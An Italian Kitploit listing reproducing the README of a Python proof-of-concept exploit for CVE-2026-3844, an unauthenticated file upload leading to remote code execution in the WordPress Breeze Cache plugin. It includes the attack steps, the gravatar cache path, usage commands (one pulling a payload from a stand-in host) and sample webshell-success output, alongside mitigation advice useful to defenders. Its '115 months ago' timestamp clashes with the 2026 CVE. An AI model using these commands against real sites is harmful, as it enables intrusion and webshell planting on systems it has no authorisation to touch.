Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-3844 — Proof-of-concept in Python per CVE-2026-3844, un upload arbitrario di file non autenticato nel plugin WordPress Breeze Cache, che consente l'esecuzione remota di codice. Include rilevamento, sfruttamento e verifica della webshell. | Kitploit
Strumenti/GitHubGitHub/sahmsec/cve-2026-3844
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingSviluppo Payload
GitHubsahmsec/cve-2026-3844

CVE-2026-3844

Proof-of-concept in Python per CVE-2026-3844, un upload arbitrario di file non autenticato nel plugin WordPress Breeze Cache, che consente l'esecuzione remota di codice. Include rilevamento, sfruttamento e verifica della webshell.

Vedi Repository
115 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-3844 — WordPress Breeze Cache Upload File Non Autenticato

Panoramica

Questo repository contiene uno script proof-of-concept (PoC) in Python per dimostrare una vulnerabilità di Upload File Arbitrario Non Autenticato che interessa il plugin WordPress Breeze Cache <= 2.4.4.

⚠️ Questo progetto è destinato esclusivamente a test di sicurezza autorizzati, ricerca educativa e validazione difensiva.


Informazioni sulla Vulnerabilità

  • ID CVE: CVE-2026-3844
  • Plugin Interessato: Breeze Cache per WordPress
  • Versioni Interessate: <= 2.4.4
  • Tipo di Problema: Upload File Arbitrario Non Autenticato
  • Impatto: Potenziale Esecuzione di Codice Remoto (RCE)
  • Vettore di Attacco: Remoto / Non Autenticato

La vulnerabilità sfrutta la funzionalità di caching dei gravatar di Breeze Cache per memorizzare file controllati dall'attaccante all'interno della directory di cache di WordPress.


Caratteristiche

  • Modalità di rilevamento della vulnerabilità
  • Flusso di sfruttamento automatizzato
  • Supporto per la verifica di webshell
  • Output terminale a colori
  • Caricamento di payload remoto
  • Controlli di verifica dell'upload
  • Registrazione opzionale dell'output

Requisiti

  • Python 3.8+
  • pycurl
  • termcolor

Installa le dipendenze:

pip install pycurl termcolor

File

FileDescrizione
CVE-2026-3844.pyScript PoC principale
CVE-2026-3844.yamlTemplate/configurazione YAML

Utilizzo

Verifica se il Target Sembra Vulnerabile

python3 CVE-2026-3844.py -u http://target.com --check-only

Esegui l'Exploit

python3 CVE-2026-3844.py -u http://target.com

Payload Personalizzato

python3 CVE-2026-3844.py -u http://target.com -p https://example.com/payload.php

Salva i Risultati

python3 CVE-2026-3844.py -u http://target.com -o results.txt

Come Funziona

Lo script esegue i seguenti passaggi:

  1. Rileva la versione di Breeze Cache installata
  2. Verifica se la versione del plugin è vulnerabile
  3. Invia una richiesta di commento WordPress appositamente costruita
  4. Sfrutta la gestione dei gravatar della cache di Breeze
  5. Attende la generazione della cache
  6. Verifica se il file caricato diventa accessibile
  7. Testa la reattività del payload

Percorso Vulnerabile

Il payload caricato potrebbe diventare accessibile da:

/wp-content/cache/breeze-extra/gravatars/

Note

Il successo dello sfruttamento potrebbe dipendere dalla seguente impostazione di Breeze abilitata:

Host Files Locally - Gravatars

Se la funzionalità è disabilitata, i tentativi di sfruttamento potrebbero fallire.


Esempio di Output

[+] Target VULNERABLE (Breeze v2.4.4)
[+] Comment posted successfully
[+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/random.php
[+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!

Disclaimer

Questo repository è fornito per:

  • Ricerca sulla sicurezza
  • Scopi educativi
  • Test di penetrazione autorizzati
  • Valutazioni di sicurezza difensive

Non utilizzare questo progetto contro sistemi che non possiedi o per i quali non hai esplicito permesso di testare.

L'autore non si assume alcuna responsabilità per usi impropri o danni causati da questo progetto.


Raccomandazioni di Mitigazione

Gli amministratori di siti web dovrebbero:

  • Aggiornare Breeze Cache all'ultima versione patchata
  • Disabilitare le funzionalità di caching dei file non necessarie
  • Limitare gli upload di file pericolosi
  • Disabilitare l'esecuzione di PHP all'interno delle directory di cache
  • Monitorare /wp-content/cache/ per file sospetti
  • Implementare un Web Application Firewall (WAF)
  • Applicare una rigorosa validazione lato server

Dichiarazione sullo Scopo Educativo

Questo proof-of-concept è stato creato per aiutare:

  • Ricercatori di sicurezza
  • Penetration tester
  • Blue team
  • Amministratori WordPress
  • Sviluppatori

a comprendere i rischi per la sicurezza associati a meccanismi di caching non sicuri e upload di file arbitrari.


Riferimenti

  • Database CVE
  • Advisory di Sicurezza WordPress
  • Linee Guida OWASP per la Sicurezza degli Upload di File
  • Documentazione del Plugin Breeze Cache

Autore

Progetto di Ricerca sulla Sicurezza / Educativo

Scarica lo strumento